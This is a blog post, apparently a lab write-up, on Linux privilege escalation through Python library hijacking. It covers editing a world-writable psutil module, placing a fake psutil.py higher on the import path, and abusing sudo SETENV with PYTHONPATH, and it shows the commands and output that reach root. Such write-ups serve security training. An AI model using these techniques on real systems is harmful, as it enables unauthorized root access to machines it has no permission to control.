<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>Your Snake is now mine: Hijacking python libraries for Local Privilege Escalation | vipa0z</title>
  <meta name="author" content="vipa0z">
  
  <meta name="description" content="There are many ways in which we can abuse a Python library to PrivEsc. Much depends on the script and its contents itself. However, there are three basic vulnerabilities where hijacking can be used to PrivEsc.">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta name="google-site-verification" content="-1CTZCLTxditzGFr67zWpI5-6H8z7TlZt_LuEkJaIKE" />

  <meta property="og:title" content="Your Snake is now mine: Hijacking python libraries for Local Privilege Escalation"/>
  <meta property="og:site_name" content="vipa0z"/>

  
    <meta property="og:image" content="favicon.png"/>
  

  
    <link rel="alternative" href="/atom.xml" title="vipa0z" type="application/atom+xml">
  
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>
  <meta name="title" content="vipa0z">
  <!-- analytics -->
  <!-- 
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>




 -->

  <!--  favicon/indexing -->
  <link rel="icon" type="image/png" href="/favicon.ico/favicon-96x96.png" sizes="96x96" />
  <link rel="icon" type="image/svg+xml" href="/favicon.ico/favicon.svg" />
  <link rel="shortcut icon" href="/favicon.ico/favicon.ico" />
  <link rel="apple-touch-icon" sizes="180x180" href="/favicon.ico/apple-touch-icon.png" />
  <link rel="manifest" href="/favicon.ico/site.webmanifest" />

<meta name="generator" content="Hexo 7.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">vipa0z</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/index" title="Home">
			  <i class="fa fa-home"></i>Home
			</a>
		  </li>
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/https://magdy3660.gitbook.io/field-manualx/" title="Read My Manual">
			  <i class="fa fa-file"></i>Read My Manual
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> Your Snake is now mine: Hijacking python libraries for Local Privilege Escalation</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <!-- <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> There are many ways in which we can abuse a Python library to PrivEsc. Much depends on the script and its contents itself. However, there are three basic vulnerabilities where hijacking can be used to PrivEsc.
		 </div> alert -->
	  		

	  <p><img src="/../images/python3122.png" alt="alt text"></p>
<h1 id="OVERVIEW"><a href="#OVERVIEW" class="headerlink" title="__OVERVIEW"></a>__OVERVIEW</h1><p>Python has <a target="_blank" rel="noopener" href="https://docs.python.org/3/library/">the Python standard library</a>, with many modules on board from a standard installation of Python. These modules provide many solutions that would otherwise have to be laboriously worked out by writing our programs. There are many ways in which we can abuse a Python library to PrivEsc. Much depends on the script and its contents itself. However, there are three basic vulnerabilities where hijacking can be used to PrivEsc.</p>
<span id="more"></span>
<h4 id="Importing-Modules"><a href="#Importing-Modules" class="headerlink" title="Importing Modules"></a>Importing Modules</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Method 1</span></span><br><span class="line"><span class="keyword">import</span> pandas</span><br><span class="line"></span><br><span class="line"><span class="comment"># Method 2</span></span><br><span class="line"><span class="keyword">from</span> pandas <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># Method 3</span></span><br><span class="line"><span class="keyword">from</span> pandas <span class="keyword">import</span> Series</span><br></pre></td></tr></table></figure>

<p>There are many ways in which we can abuse a Python library to PrivEsc. Much depends on the script and its contents itself. However, there are three basic vulnerabilities where hijacking can be used:</p>
<ol>
<li>Wrong write permissions</li>
<li>Library Path</li>
<li>PYTHONPATH environment variable</li>
</ol>
<hr>
<h2 id="Wrong-Write-Permissions"><a href="#Wrong-Write-Permissions" class="headerlink" title="Wrong Write Permissions"></a>Wrong Write Permissions</h2><p>For example, we can imagine that we are in a developer’s host and that the developer is working with python. So we have a total of three components that are connected. This is the actual python script that imports a python module and the privileges of the script as well as the permissions of the module.</p>
<p>One or another python module may have write permissions set for all users by mistake. This allows the python module to be edited and manipulated so that we can insert commands or functions that will produce the results we want. If <code>SUID</code>&#x2F;<code>SGID</code> permissions have been assigned to the Python script that imports this module, our code will automatically be included.</p>
<p>If we look at the set permissions of the <code>mem_status.py</code> script, we can see that it has a <code>SUID</code> set.</p>
<p>Checking our sudo privileges reveals a python script that we can with elevated permissions.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">crytix@ubuntu:~$ sudo -l </span><br><span class="line">Matching Defaults entries for htb-student on ubuntu:</span><br><span class="line">    env_reset, mail_badpass,</span><br><span class="line">    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User crytix may run the following commands on ubuntu:</span><br><span class="line">    (ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py</span><br><span class="line">htb-student@ubuntu:~$ </span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">crytix@ubuntu:~$ ls -la mem_status.py </span><br><span class="line">-rwSrwxr-x 1 root root 192 May 19  2023 mem_status.py</span><br></pre></td></tr></table></figure>
<p>![[Pasted image 20250712203305.png]]<br><code>r-x</code><br>By analyzing the permissions over the <code>mem_status.py</code> Python file, we understand that we can execute this script and we also have permission to view the script, and read its contents.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> psutil</span><br><span class="line"></span><br><span class="line">available_memory = psutil.virtual_memory().available * <span class="number">100</span> / psutil.virtual_memory().total</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;Available memory: <span class="subst">&#123;<span class="built_in">round</span>(available_memory, <span class="number">2</span>)&#125;</span>%&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>We can also see in the second line that this script imports the module <code>psutil</code> and uses the function <code>virtual_memory()</code>.</p>
<p>So we can look for this function in the folder of <code>psutil</code> and check if this module has write permissions for us.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">crytix@lpenix:~$ grep -r &quot;def virtual_memory&quot; /usr/local/lib/python3.8/dist-packages/psutil/*</span><br><span class="line"></span><br><span class="line">/usr/local/lib/python3.8/dist-packages/psutil/__init__.py:def virtual_memory():</span><br><span class="line">/usr/local/lib/python3.8/dist-packages/psutil/_psaix.py:def virtual_memory():</span><br><span class="line">/usr/local/lib/python3.8/dist-packages/psutil/_psbsd.py:def virtual_memory():</span><br><span class="line">/usr/local/lib/python3.8/dist-packages/psutil/_pslinux.py:def virtual_memory():</span><br><span class="line">/usr/local/lib/python3.8/dist-packages/psutil/_psosx.py:def virtual_memory():</span><br><span class="line">/usr/local/lib/python3.8/dist-packages/psutil/_pssunos.py:def virtual_memory():</span><br><span class="line">/usr/local/lib/python3.8/dist-packages/psutil/_pswindows.py:def virtual_memory():</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">htb-student@lpenix:~$ ls -l /usr/local/lib/python3.8/dist-packages/psutil/__init__.py</span><br><span class="line"></span><br><span class="line">-rw-r--rw- 1 root staff 87339 Dec 13 20:07 /usr/local/lib/python3.8/dist-packages/psutil/__init__.py</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">vim /usr/local/lib/python3.8/dist-packages/psutil/__init.py</span></span><br></pre></td></tr></table></figure>

<p>in vim<br>press <code>/</code> to search and write the method defintion (<code>virtual_memory()</code>)<br><code>/def virtual_memory</code><br>![[Pasted image 20250712202409.png]]<br>Now lets insert our malicious code</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">...SNIP...</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">virtual_memory</span>():</span><br><span class="line"></span><br><span class="line">	...SNIP...</span><br><span class="line">	<span class="comment">#### Hijacking</span></span><br><span class="line">	<span class="keyword">import</span> os</span><br><span class="line">	os.system(<span class="string">&#x27;cat /root/flag.txt&#x27;</span>)</span><br><span class="line">	</span><br><span class="line"></span><br><span class="line">    <span class="keyword">global</span> _TOTAL_PHYMEM</span><br><span class="line">    ret = _psplatform.virtual_memory()</span><br><span class="line">    <span class="comment"># cached for later use in Process.memory_percent()</span></span><br><span class="line">    _TOTAL_PHYMEM = ret.</span><br></pre></td></tr></table></figure>

<p>press <code>esc</code> + <code>:</code> + <code>wq!</code></p>
<p>forcing sudo to execute the command when apparmor or filesystem&#x2F;wrappers are intercepting</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">~$ </span><span class="language-bash"><span class="built_in">sudo</span> -u root /usr/bin/python3 /home/htb-student/mem_status.py</span></span><br><span class="line">HTB&#123;3xpl0xxxxxxxx4ry_HIjiNX&#125;</span><br></pre></td></tr></table></figure>
<hr>
<h2 id="Library-Path-Abuse"><a href="#Library-Path-Abuse" class="headerlink" title="Library Path Abuse"></a>Library Path Abuse</h2><p>In Python, each version has a specified order in which libraries (<code>modules</code>) are searched and imported from. The order in which Python imports <code>modules</code> from are based on a priority system, meaning that paths higher on the list take priority over ones lower on the list. We can see this by issuing the following command:</p>
<p>uming all contain a file named <code>mymodule.py</code>.</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">example_project/</span><br><span class="line">├── main.py                  # Your main script</span><br><span class="line">├── mymodule.py              # [Priority #<span class="number">1</span>] Local <span class="title function_ invoke__">module</span> (script directory)</span><br><span class="line">├── custom_dir/              # [Priority #<span class="number">2</span> <span class="keyword">if</span> added manually to sys.path]</span><br><span class="line">│   └── mymodule.py</span><br><span class="line">├── venv/                    # [Priority #<span class="number">3</span>] Virtual environment site-packages</span><br><span class="line">│   └── lib/</span><br><span class="line">│       └── python3.x/</span><br><span class="line">│           └── site-packages/</span><br><span class="line">│               └── mymodule.py</span><br><span class="line">└── system/</span><br><span class="line">    └── python3.x/</span><br><span class="line">        └── lib/</span><br><span class="line">            └── mymodule.py  # [Lowest priority] Global standard library or installed packages</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Path-Listing"><a href="#Path-Listing" class="headerlink" title="Path Listing"></a>Path Listing</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ python3 -c <span class="string">&#x27;import sys; print(&quot;\n&quot;.join(sys.path))&#x27;</span></span><br><span class="line"></span><br><span class="line">/usr/lib/python38.<span class="built_in">zip</span></span><br><span class="line">/usr/lib/python3<span class="number">.8</span></span><br><span class="line">/usr/lib/python3<span class="number">.8</span>/lib-dynload</span><br><span class="line">/usr/local/lib/python3<span class="number">.8</span>/dist-packages</span><br><span class="line">/usr/lib/python3/dist-packages</span><br><span class="line">/usr/lib/python3/dist-packages/sys* </span><br></pre></td></tr></table></figure>

<p>Notice how the <code>sys</code> module is located under one of the lower priority paths listed via the <code>PYTHONPATH</code> variable.</p>
<p>Therefore, if the imported module is located in a path lower on the list and a higher priority path is editable by our user, we can create a module ourselves with the same name and include our own desired functions. </p>
<p>Since the higher priority path is read earlier and examined for the module in question, Python accesses the first hit it finds and imports it before reaching the original and intended module.</p>
<p>In order to exploit this We must have write permissions to one of the paths having a higher priority on the list.</p>
<p> let us continue with the previous example and show how this can be exploited. Previously, the <code>psutil</code> module was imported into the <code>mem_status.py</code> script. We can see <code>psutil</code>‘s default installation location by issuing the following command:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">crytix@lpenix:~$ pip3 show psutil</span><br><span class="line"></span><br><span class="line">Location: /usr/local/lib/python3.8/dist-packages</span><br><span class="line"></span><br><span class="line">&lt;SNIP&gt;</span><br></pre></td></tr></table></figure>
<p>we can see that <code>psutil</code> is installed in the following path: <code>/usr/local/lib/python3.8/dist-packages</code>. From our previous listing of the <code>PYTHONPATH</code> variable, we have a reasonable amount of directories to choose from to see if there might be any misconfigurations in the environment to allow us <code>write</code> access to any of them. Let us check.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash"><span class="built_in">ls</span> -la /usr/lib/python3.8</span></span><br><span class="line"></span><br><span class="line">total 4916</span><br><span class="line">drwxr-xrwx 30 root root  20480 Dec 14 16:26 .</span><br><span class="line">...SNIP...</span><br></pre></td></tr></table></figure>
<p>it appears that <code>/usr/lib/python3.8</code> path is misconfigured in a way to allow any user to write to it. Cross-checking with values from the <code>PYTHONPATH</code> variable, we can see that this path is higher on the list than the path in which <code>psutil</code> is installed in.<br>Now lets create our module that will get executed before the original and place it<br>under <code>/dist-packages</code>, we’ll have to name it <code>psutil.py</code> so python recognizes the name</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">virtual_memory</span>():</span><br><span class="line">    os.system(<span class="string">&#x27;id&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>copy our fake module to dist-packages</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cp psutil.py  /usr/local/lib/python3.8/dist-packages</span><br></pre></td></tr></table></figure>
<p>test</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ sudo /usr/bin/python3 mem_status.py</span><br><span class="line">or $ sudo -u root /usr/bin/python3 /home/htb-student/mem_status.py</span><br><span class="line"></span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br></pre></td></tr></table></figure>
<p>As we can see from the output, we have successfully gained execution as <code>root</code> through hijacking the module’s path via a misconfiguration in the permissions of the <code>/usr/lib/python3.8</code> directory.</p>
<hr>
<h2 id="PYTHONPATH-Environment-Variable"><a href="#PYTHONPATH-Environment-Variable" class="headerlink" title="PYTHONPATH Environment Variable"></a>PYTHONPATH Environment Variable</h2><p><code>PYTHONPATH</code> is an environment variable that indicates what directory (or directories) Python can search for modules to import. This is important as if a user is allowed to manipulate and set this variable while running the python binary, they can effectively redirect Python’s search functionality to a <code>user-defined</code> location when it comes time to import modules. We can see if we have the permissions to set environment variables for the python binary by checking our <code>sudo</code> permissions:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash"><span class="built_in">sudo</span> -l</span> </span><br><span class="line"></span><br><span class="line">Matching Defaults entries for htb-student on ACADEMY-LPENIX:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User crytix may run the following commands on LPENIX:</span><br><span class="line">    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3</span><br></pre></td></tr></table></figure>
<p>As we can see from the example, we are allowed to run <code>/usr/bin/python3</code> under the trusted permissions of <code>sudo</code> and are therefore allowed to set environment variables for use with this binary by the <code>SETENV:</code> flag being set. It is important to note, that due to the trusted nature of <code>sudo</code>, any environment variables defined prior to calling the binary are not subject to any restrictions regarding being able to set environment variables on the system. This means that using the <code>/usr/bin/python3</code> binary, we can effectively set any environment variables under the context of our running program. Let’s try to do so now using the <code>psutil.py</code> script from the last section.        </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">crytix@lpenix:~$ sudo PYTHONPATH=/tmp/ /usr/bin/python3 ./mem_status.py</span><br><span class="line"></span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br><span class="line">...SNIP...</span><br></pre></td></tr></table></figure>

<p>In this example, we moved the previous python script from the <code>/usr/lib/python3.8</code> directory to <code>/tmp</code>. From here we once again call <code>/usr/bin/python3</code> to run <code>mem_stats.py</code>, however, we specify that the <code>PYTHONPATH</code> variable contain the <code>/tmp</code> directory so that it forces Python to search that directory looking for the <code>psutil</code> module to import. As we can see, we once again have successfully run our script under the context of root.</p>

	  <div class="article-footer-copyright">

</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2025/07/13/chwoot/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2025/07/08/No-pac/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2025-07-12 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/python/">python<span>1</span></a></li> <li><a href="/tags/python-imports/">python imports<span>1</span></a></li> <li><a href="/tags/PrivEsc/">PrivEsc<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2025 vipa0z's Blog
  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
